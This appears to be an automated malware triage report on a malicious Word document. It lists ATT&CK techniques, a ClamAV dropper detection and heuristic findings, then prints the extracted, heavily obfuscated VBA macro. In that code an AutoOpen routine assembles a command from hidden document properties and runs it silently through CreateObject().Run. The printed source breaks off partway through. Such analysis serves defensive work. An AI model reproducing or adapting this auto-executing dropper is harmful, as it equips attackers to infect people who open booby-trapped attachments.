MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes CreateObject, a common technique for executing arbitrary code, suggesting it's designed to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6335671-0' further supports its role as a dropper.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6335671-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6335671-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() DASAtBDASAtBDASAtBDASAtBDASAtB -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
dmYUNdmYUNdmYUNdmYUNdmYUN = "WgturWgturWgturWgturWgtur" + "NEHSmNEHSmNEHSmNEHSmNEHSm" = "spSeEspSeEspSeEspSeEspSeE" CreateObject(YEMgcYEMgcYEMgcYEMgcYEMgc + LBteAeLBteAeLBteAeLBteAeLBteAe("MLkHZMLkHZMLkHZMLkHZMLkHZ") + LBteAeLBteAeLBteAeLBteAeLBteAe("FSuRPAFSuRPAFSuRPAFSuRPAFSuRPA")).Run$ vCdWKvCdWKvCdWKvCdWKvCdWK, 0 tcyPyxtcyPyxtcyPyxtcyPyxtcyPyx = "ZVrWuhZVrWuhZVrWuhZVrWuhZVrWuh" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21812 bytes |
SHA-256: e7b134f6e4e02d5b08a6802d387bd65f1991b4a394c0d9961219ce04f5adf379 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
147 of 205 identifiers look randomly generated (e.g. 'SWSKdWSWSKdWSWSKdWSWSKdWSWSKdW') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function CpamGCpamGCpamGCpamGCpamG(ByVal zdrEZhzdrEZhzdrEZhzdrEZhzdrEZh As String, ByVal MVKaEMVKaEMVKaEMVKaEMVKaE As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each UdcwBUdcwBUdcwBUdcwBUdcwB In MVKaEMVKaEMVKaEMVKaEMVKaE
If UdcwBUdcwBUdcwBUdcwBUdcwB = zdrEZhzdrEZhzdrEZhzdrEZhzdrEZh Then
CpamGCpamGCpamGCpamGCpamG = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next UdcwBUdcwBUdcwBUdcwBUdcwB
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function BKdkABKdkABKdkABKdkABKdkA(ByVal wBGVHfwBGVHfwBGVHfwBGVHfwBGVHf As String, ByVal wsEbkwsEbkwsEbkwsEbkwsEbk As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each PTNuEPTNuEPTNuEPTNuEPTNuE In wsEbkwsEbkwsEbkwsEbkwsEbk
If PTNuEPTNuEPTNuEPTNuEPTNuE = wBGVHfwBGVHfwBGVHfwBGVHfwBGVHf Then
BKdkABKdkABKdkABKdkABKdkA = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next PTNuEPTNuEPTNuEPTNuEPTNuE
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function AnestAnestAnestAnestAnest(ByVal YpUMNgYpUMNgYpUMNgYpUMNgYpUMNg As String, ByVal GkKzaGkKzaGkKzaGkKzaGkKza As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each uPvZMuPvZMuPvZMuPvZMuPvZM In GkKzaGkKzaGkKzaGkKzaGkKza
If uPvZMuPvZMuPvZMuPvZMuPvZM = YpUMNgYpUMNgYpUMNgYpUMNgYpUMNg Then
AnestAnestAnestAnestAnest = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next uPvZMuPvZMuPvZMuPvZMuPvZM
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function CUzADuCUzADuCUzADuCUzADuCUzADu(ByVal wWtYLZwWtYLZwWtYLZwWtYLZwWtYLZ As String, ByVal CbpPhCbpPhCbpPhCbpPhCbpPh As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each gWbUkygWbUkygWbUkygWbUkygWbUky In CbpPhCbpPhCbpPhCbpPhCbpPh
If gWbUkygWbUkygWbUkygWbUkygWbUky = wWtYLZwWtYLZwWtYLZwWtYLZwWtYLZ Then
CUzADuCUzADuCUzADuCUzADuCUzADu = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next gWbUkygWbUkygWbUkygWbUkygWbUky
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Sub autoopen()
DASAtBDASAtBDASAtBDASAtBDASAtB
End Sub
Public Function LBteAeLBteAeLBteAeLBteAeLBteAe(ZHDdFwZHDdFwZHDdFwZHDdFwZHDdFw)
tsydutsydutsydutsydutsydu = "bkvHVzbkvHVzbkvHVzbkvHVzbkvHVz"
CKaVdCKaVdCKaVdCKaVdCKaVd = "ScCPCScCPCScCPCScCPCScCPC" + "rzYTdrzYTdrzYTdrzYTdrzYTd" = "sePcNXsePcNXsePcNXsePcNXsePcNX"
LBteAeLBteAeLBteAeLBteAeLBteAe = ActiveDocument.CustomDocumentProperties(ZHDdFwZHDdFwZHDdFwZHDdFwZHDdFw)
ZdNynZdNynZdNynZdNynZdNyn = "cNZDacNZDacNZDacNZDacNZDa"
XnuzZZXnuzZZXnuzZZXnuzZZXnuzZZ = "ecVLrecVLrecVLrecVLrecVLr" + "xaxAgxaxAgxaxAgxaxAgxaxAg" = "XPSgenXPSgenXPSgenXPSgenXPSgen"
DKZgtDKZgtDKZgtDKZgtDKZgt = "DEXFVDEXFVDEXFVDEXFVDEXFV"
gkSkegkSkegkSkegkSkegkSke = "tFyzpatFyzpatFyzpatFyzpatFyzpa" + "FNExgFNExgFNExgFNExgFNExg" = "FyUkBfFyUkBfFyUkBfFyUkBfFyUkBf"
End Function
Public Function vCdWKvCdWKvCdWKvCdWKvCdWK()
SNBApSNBApSNBApSNBApSNBAp = LBteAeLBteAeLBteAeLBteAeLBteAe("DXwpcRDXwpcRDXwpcRDXwpcRDXwpcR") + LBteAeLBteAeLBteAeLBteAeLBteAe("bNyFDDbNyFDDbNyFDDbNyFDDbNyFDD") + LBteAeLBteAeLBteAeLBteAeLBteAe("aedXntaedXntaedXntaedXntaedXnt") + LBteAeLBteAeLBteAeLBteAeLBteAe("EZmPdAEZmPdAEZmPdAEZmPdAEZmPdA")
WkNkUWkNkUWkNkUWkNkUWkNkU = "BnvZkTBnvZkTBnvZkTBnvZkTBnvZkT"
uGaLguGaLguGaLguGaLguGaLg = "bGpBtzbGpBtzbGpBtzbGpBtzbGpBtz" + "muvAemuvAemuvAemuvAemuvAe" = "cmDDtcmDDtcmDDtcmDDtcmDDt"
XHVWXXHVWXXHVWXXHVWXXHVWX = "tgwKhvtgwKhvtgwKhvtgwKhvtgwKhv"
TYxMAkTYxMAkTYxMAkTYxMAkTYxMAk = "EZXZbEZXZbEZXZbEZXZbEZXZb" + "SWSKdWSWSKdWSWSKdWSWSKdWSWSKdW" = "HLmByHLmByHLmByHLmByHLmBy"
CGFVnCGFVnCGFVnCGFVnCGFVn = LBteAeLBteAeLBteAeLBteAeLBteAe("bDLpbbDLpbbDLpbbDLpbbDLpb") + LBteAeLBteAeLBteAeLBteAeLBteAe("gCPFfbgCPFfbgCPFfbgCPFfbgCPFfb") + LBteAeLBteAeLBteAeLBteAeLBteAe("SHZSZdSHZSZdSHZSZdSHZSZdSHZSZd") + LBteAeLBteAeLBteAeLBteAeLBteAe("wKXnhwKXnhwKXnhwKXnhwKXnh") + LBteAeLBteAeLBteAeLBteAeLBteAe("htUwMhtUwMhtUwMhtUwMhtUwM")
FEawzdFEawzdFEawzdFEawzdFEawzd = CGFVnCGFVnCGFVnCGFVnCGFVn + SNBApSNBApSNBApSNBApSNBAp
ASFCfYASFCfYASFCfYASFCfYASFCfY = "pCvfBpCvfBpCvfBpCvfBpCvfB"
rWpGdrWpGdrWpGdrWpGdrWpGd = "uzcDkzuzcDkzuzcDkzuzcDkzuzcDkz" + "BWFySvBWFySvBWFySvBWFySvBWFySv" = "egFutegFutegFutegFutegFut"
CweYaCweYaCweYaCweYaCweYa = "mggakmggakmggakmggakmggak"
gyYfLgyYfLgyYfLgyYfLgyYfL = "tGVPwPtGVPwPtGVPwPtGVPwPtGVPwP" + "AWxaEAWxaEAWxaEAWxaEAWxaE" = "CwCPKCwCPKCwCPKCwCPKCwCPK"
UZChYLUZChYLUZChYLUZChYLUZChYL = "wVsbnRwVsbnRwVsbnRwVsbnRwVsbnR"
TuvCFATuvCFATuvCFATuvCFATuvCFA = "BVXrfpBVXrfpBVXrfpBVXrfpBVXrfp" + "bVWhEbVWhEbVWhEbVWhEbVWhE" = "CXakZCXakZCXakZCXakZCXakZ"
vCdWKvCdWKvCdWKvCdWKvCdWK = FEawzdFEawzdFEawzdFEawzdFEawzd + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function YEMgcYEMgcYEMgcYEMgcYEMgc()
cpzmpcpzmpcpzmpcpzmpcpzmp = "zvrEAwzvrEAwzvrEAwzvrEAwzvrEAw"
VawFwVawFwVawFwVawFwVawFw = "ZhLaUZhLaUZhLaUZhLaUZhLaU" + "vdBfgvdBfgvdBfgvdBfgvdBfg" = "ktDbPWktDbPWktDbPWktDbPWktDbPW"
eunRxeunRxeunRxeunRxeunRx = "bAvCPbAvCPbAvCPbAvCPbAvCP"
HgdkXHgdkXHgdkXHgdkXHgdkX = "KbvxAVKbvxAVKbvxAVKbvxAVKbvxAV" + "HSmGLHSmGLHSmGLHSmGLHSmGL" = "EghmySEghmySEghmySEghmySEghmyS"
geTfTzgeTfTzgeTfTzgeTfTzgeTfTz = "aDhMeaDhMeaDhMeaDhMeaDhMe"
MeEcdMeEcdMeEcdMeEcdMeEcd = "scedLtscedLtscedLtscedLtscedLt" + "uZHxeuZHxeuZHxeuZHxeuZHxe" = "YbBUCYbBUCYbBUCYbBUCYbBUC"
YEMgcYEMgcYEMgcYEMgcYEMgc = LBteAeLBteAeLBteAeLBteAeLBteAe("ZTWsnZTWsnZTWsnZTWsnZTWsn") + LBteAeLBteAeLBteAeLBteAeLBteAe("mnrRxmnrRxmnrRxmnrRxmnrRx") + LBteAeLBteAeLBteAeLBteAeLBteAe("FAcXTgFAcXTgFAcXTgFAcXTgFAcXTg")
End Function
Public Function DASAtBDASAtBDASAtBDASAtBDASAtB()
pSYxWgpSYxWgpSYxWgpSYxWgpSYxWg = "ZcDemZcDemZcDemZcDemZcDem"
hktRehktRehktRehktRehktRe = "yYRgKfyYRgKfyYRgKfyYRgKfyYRgKf" + "NERVnKNERVnKNERVnKNERVnKNERVnK" = "bXMCcbXMCcbXMCcbXMCcbXMCc"
HfmsmHfmsmHfmsmHfmsmHfmsm = "PACPhvPACPhvPACPhvPACPhvPACPhv"
MdeDZhMdeDZhMdeDZhMdeDZhMdeDZh = "mBKehmBKehmBKehmBKehmBKeh" + "yxRHNByxRHNByxRHNByxRHNByxRHNB" = "cSEKuYcSEKuYcSEKuYcSEKuYcSEKuY"
dSXNsddSXNsddSXNsddSXNsddSXNsd = "wtHxLSwtHxLSwtHxLSwtHxLSwtHxLS"
dmYUNdmYUNdmYUNdmYUNdmYUN = "WgturWgturWgturWgturWgtur" + "NEHSmNEHSmNEHSmNEHSmNEHSm" = "spSeEspSeEspSeEspSeEspSeE"
CreateObject(YEMgcYEMgcYEMgcYEMgcYEMgc + LBteAeLBteAeLBteAeLBteAeLBteAe("MLkHZMLkHZMLkHZMLkHZMLkHZ") + LBteAeLBteAeLBteAeLBteAeLBteAe("FSuRPAFSuRPAFSuRPAFSuRPAFSuRPA")).Run$ vCdWKvCdWKvCdWKvCdWKvCdWK, 0
tcyPyxtcyPyxtcyPyxtcyPyxtcyPyx = "ZVrWuhZVrWuhZVrWuhZVrWuhZVrWuh"
GpVHatGpVHatGpVHatGpVHatGpVHat = "XHuvyXHuvyXHuvyXHuvyXHuvy" + "FLmcZrFLmcZrFLmcZrFLmcZrFLmcZr" = "dzAFudzAFudzAFudzAFudzAFu"
uYDbUxuYDbUxuYDbUxuYDbUxuYDbUx = "TcahZhTcahZhTcahZhTcahZhTcahZh"
vUBuCkvUBuCkvUBuCkvUBuCkvUBuCk = "EEMDDEEMDDEEMDDEEMDDEEMDD" + "CtyPkrCtyPkrCtyPkrCtyPkrCtyPkr" = "TFSKYTFSKYTFSKYTFSKYTFSKY"
End Function
Function GFsCtGFsCtGFsCtGFsCtGFsCt(ByVal kpFMxkpFMxkpFMxkpFMxkpFMx As String, ByVal fVEENfVEENfVEENfVEENfVEEN As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each PBKWaWPBKWaWPBKWaWPBKWaWPBKWaW In fVEENfVEENfVEENfVEENfVEEN
If PBKWaWPBKWaWPBKWaWPBKWaWPBKWaW = kpFMxkpFMxkpFMxkpFMxkpFMx Then
GFsCtGFsCtGFsCtGFsCtGFsCt = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next PBKWaWPBKWaWPBKWaWPBKWaWPBKWaW
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function AvfBXAvfBXAvfBXAvfBXAvfBX(ByVal avCyxxavCyxxavCyxxavCyxxavCyxx As String, ByVal cUYsnEcUYsnEcUYsnEcUYsnEcUYsnE As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each WrhCNWrhCNWrhCNWrhCNWrhCN In cUYsnEcUYsnEcUYsnEcUYsnEcUYsnE
If WrhCNWrhCNWrhCNWrhCNWrhCN = avCyxxavCyxxavCyxxavCyxxavCyxx Then
AvfBXAvfBXAvfBXAvfBXAvfBX = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next WrhCNWrhCNWrhCNWrhCNWrhCN
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function FYWFyTFYWFyTFYWFyTFYWFyTFYWFyT(ByVal SghpmnSghpmnSghpmnSghpmnSghpmn As String, ByVal pNpZwvpNpZwvpNpZwvpNpZwvpNpZwv As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each vcbVBdvcbVBdvcbVBdvcbVBdvcbVBd In pNpZwvpNpZwvpNpZwvpNpZwvpNpZwv
If vcbVBdvcbVBdvcbVBdvcbVBdvcbVBd = SghpmnSghpmnSghpmnSghpmnSghpmn Then
FYWFyTFYWFyTFYWFyTFYWFyTFYWFyT = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next vcbVBdvcbVBdvcbVBdvcbVBdvcbVBd
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function NMxeyNMxeyNMxeyNMxeyNMxey(ByVal MudNfMudNfMudNfMudNfMudNf As String, ByVal xbTxwxbTxwxbTxwxbTxwxbTxw As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each vbWEKsvbWEKsvbWEKsvbWEKsvbWEKs In xbTxwxbTxwxbTxwxbTxwxbTxw
If vbWEKsvbWEKsvbWEKsvbWEKsvbWEKs = MudNfMudNfMudNfMudNfMudNf Then
NMxeyNMxeyNMxeyNMxeyNMxey = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next vbWEKsvbWEKsvbWEKsvbWEKsvbWEKs
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function HpecBsHpecBsHpecBsHpecBsHpecBs(ByVal CAgBxCAgBxCAgBxCAgBxCAgBx As String, ByVal ytfpSnytfpSnytfpSnytfpSnytfpSn As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each gTsTuFgTsTuFgTsTuFgTsTuFgTsTuF In ytfpSnytfpSnytfpSnytfpSnytfpSn
If gTsTuFgTsTuFgTsTuFgTsTuFgTsTuF = CAgBxCAgBxCAgBxCAgBxCAgBx Then
HpecBsHpecBsHpecBsHpecBsHpecBs = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next gTsTuFgTsTuFgTsTuFgTsTuFgTsTuF
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function KHzVsKHzVsKHzVsKHzVsKHzVs(ByVal LEVPYpLEVPYpLEVPYpLEVPYpLEVPYp As String, ByVal CaemMCaemMCaemMCaemMCaemM As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each AdFkAvAdFkAvAdFkAvAdFkAvAdFkAv In CaemMCaemMCaemMCaemMCaemM
If AdFkAvAdFkAvAdFkAvAdFkAvAdFkAv = LEVPYpLEVPYpLEVPYpLEVPYpLEVPYp Then
KHzVsKHzVsKHzVsKHzVsKHzVs = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
Next AdFkAvAdFkAvAdFkAvAdFkAvAdFkAv
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
End Function
Function PXWVMPXWVMPXWVMPXWVMPXWVM(ByVal hfDUXehfDUXehfDUXehfDUXehfDUXe As String, ByVal hUsmnDhUsmnDhUsmnDhUsmnDhUsmnD As Variant) As Boolean
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
For Each BBRLzdBBRLzdBBRLzdBBRLzdBBRLzd In hUsmnDhUsmnDhUsmnDhUsmnDhUsmnD
If BBRLzdBBRLzdBBRLzdBBRLzdBBRLzd = hfDUXehfDUXehfDUXehfDUXehfDUXe Then
PXWVMPXWVMPXWVMPXWVMPXWVM = True
Exit Function
End If
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
BHtPzBHtPzBHtPzBHtPzBHtPz = "rShUevrShUevrShUevrShUevrShUev" + "fZEFnfZEFnfZEFnfZEFnfZEFn" = "ZkLFgEZkLFgEZkLFgEZkLFgEZkLFgE"
